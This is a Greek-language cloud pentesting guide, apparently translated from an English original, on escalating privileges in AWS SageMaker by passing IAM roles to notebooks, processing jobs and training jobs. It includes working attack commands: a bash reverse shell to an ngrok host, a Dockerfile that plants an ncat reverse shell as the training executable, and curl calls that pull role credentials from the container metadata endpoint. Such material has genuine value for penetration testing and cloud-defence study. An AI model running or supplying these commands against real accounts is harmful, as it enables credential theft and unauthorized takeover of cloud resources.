AWS - Sagemaker Privesc

AWS - Sagemaker Privesc

iam:PassRole , sagemaker:CreateNotebookInstance, sagemaker:CreatePresignedNotebookInstanceUrl

Αρχίστε να δημιουργείτε ένα notebook με τον IAM Ρόλο που είναι συνδεδεμένος σε αυτό:

aws sagemaker create-notebook-instance --notebook-instance-name example \
--instance-type ml.t2.medium \
--role-arn arn:aws:iam::<account-id>:role/service-role/<role-name>

Η απάντηση θα πρέπει να περιέχει ένα πεδίο NotebookInstanceArn, το οποίο θα περιέχει το ARN της νεοδημιουργημένης παρουσίας σημειωματάριου. Μπορούμε στη συνέχεια να χρησιμοποιήσουμε το API create-presigned-notebook-instance-url για να δημιουργήσουμε μια διεύθυνση URL που μπορούμε να χρησιμοποιήσουμε για να αποκτήσουμε πρόσβαση στην παρουσία σημειωματάριου μόλις είναι έτοιμη:

aws sagemaker create-presigned-notebook-instance-url \
--notebook-instance-name <name>

Πλοηγηθείτε στη διεύθυνση URL με τον περιηγητή και κάντε κλικ στο `Open JupyterLab` στην επάνω δεξιά γωνία, στη συνέχεια, μετακινηθείτε προς τα κάτω στην καρτέλα “Launcher” και κάτω από την ενότητα “Other”, κάντε κλικ στο κουμπί “Terminal”.

Τώρα είναι δυνατή η πρόσβαση στα διαπιστευτήρια μεταδεδομένων του IAM Role.

Πιθανές Επιπτώσεις: Privesc στον ρόλο υπηρεσίας sagemaker που έχει καθοριστεί.

sagemaker:CreatePresignedNotebookInstanceUrl

Εάν υπάρχουν Jupyter notebooks που εκτελούνται ήδη σε αυτό και μπορείτε να τα καταγράψετε με το sagemaker:ListNotebookInstances (ή να τα ανακαλύψετε με οποιονδήποτε άλλο τρόπο). Μπορείτε να δημιουργήσετε μια διεύθυνση URL γι' αυτά, να τα αποκτήσετε πρόσβαση και να κλέψετε τα διαπιστευτήρια όπως υποδεικνύεται στην προηγούμενη τεχνική.

aws sagemaker create-presigned-notebook-instance-url --notebook-instance-name <name>

Πιθανές Επιπτώσεις: Privesc στον ρόλο υπηρεσίας sagemaker που είναι συνημμένος.

sagemaker:CreateProcessingJob,iam:PassRole

Ένας επιτιθέμενος με αυτές τις άδειες μπορεί να κάνει το sagemaker να εκτελέσει ένα processingjob με έναν ρόλο sagemaker συνημμένο σε αυτό. Ο επιτιθέμενος μπορεί να υποδείξει τον ορισμό του κοντέινερ που θα εκτελείται σε μια διαχειριζόμενη από την AWS ECS instance, και να κλέψει τα διαπιστευτήρια του συνημμένου IAM ρόλου.

# I uploaded a python docker image to the ECR
aws sagemaker create-processing-job \
--processing-job-name privescjob \
--processing-resources '{"ClusterConfig": {"InstanceCount": 1,"InstanceType": "ml.t3.medium","VolumeSizeInGB": 50}}' \
--app-specification "{\"ImageUri\":\"<id>.dkr.ecr.eu-west-1.amazonaws.com/python\",\"ContainerEntrypoint\":[\"sh\", \"-c\"],\"ContainerArguments\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14920 0>&1\\\"\"]}" \
--role-arn <sagemaker-arn-role>

# In my tests it took 10min to receive the shell
curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" #To get the creds

Πιθανές Επιπτώσεις: Privesc στον ρόλο υπηρεσίας sagemaker που καθορίζεται.

sagemaker:CreateTrainingJob, iam:PassRole

Ένας επιτιθέμενος με αυτές τις άδειες θα είναι σε θέση να δημιουργήσει μια εργασία εκπαίδευσης, τρέχοντας ένα αυθαίρετο κοντέινερ πάνω σε αυτή με έναν συνδεδεμένο ρόλο. Επομένως, ο επιτιθέμενος θα είναι σε θέση να κλέψει τα διαπιστευτήρια του ρόλου.

# Create docker image
mkdir /tmp/rev
## Note that the trainning job is going to call an executable called "train"
## That's why I'm putting the rev shell in /bin/train
## Set the values of <YOUR-IP-OR-DOMAIN> and <YOUR-PORT>
cat > /tmp/rev/Dockerfile <<EOF
FROM ubuntu
RUN apt update && apt install -y ncat curl
RUN printf '#!/bin/bash\nncat <YOUR-IP-OR-DOMAIN> <YOUR-PORT> -e /bin/sh' > /bin/train
RUN chmod +x /bin/train
CMD ncat <YOUR-IP-OR-DOMAIN> <YOUR-PORT> -e /bin/sh
EOF

cd /tmp/rev
sudo docker build . -t reverseshell

# Upload it to ECR
sudo docker login -u AWS -p $(aws ecr get-login-password --region <region>) <id>.dkr.ecr.<region>.amazonaws.com/<repo>
sudo docker tag reverseshell:latest <account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell:latest
sudo docker push <account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell:latest

# Create trainning job with the docker image created
aws sagemaker create-training-job \
--training-job-name privescjob \
--resource-config '{"InstanceCount": 1,"InstanceType": "ml.m4.4xlarge","VolumeSizeInGB": 50}' \
--algorithm-specification '{"TrainingImage":"<account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell", "TrainingInputMode": "Pipe"}' \
--role-arn <role-arn> \
--output-data-config '{"S3OutputPath": "s3://<bucket>"}' \
--stopping-condition '{"MaxRuntimeInSeconds": 600}'

#To get the creds
curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
## Creds env var value example:/v2/credentials/proxy-f00b92a68b7de043f800bd0cca4d3f84517a19c52b3dd1a54a37c1eca040af38-customer

Πιθανές Επιπτώσεις: Privesc στον ρόλο υπηρεσίας sagemaker που καθορίζεται.

sagemaker:CreateHyperParameterTuningJob, iam:PassRole

Ένας επιτιθέμενος με αυτές τις άδειες θα (πιθανώς) μπορεί να δημιουργήσει μια εργασία εκπαίδευσης υπερπαραμέτρων, τρέχοντας ένα αυθαίρετο κοντέινερ σε αυτήν με έναν συνδεδεμένο ρόλο. &#xNAN;I δεν έχω εκμεταλλευτεί λόγω έλλειψης χρόνου, αλλά φαίνεται παρόμοιο με τις προηγούμενες εκμεταλλεύσεις, μη διστάσετε να στείλετε μια PR με τις λεπτομέρειες εκμετάλλευσης.

Αναφορές

• https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/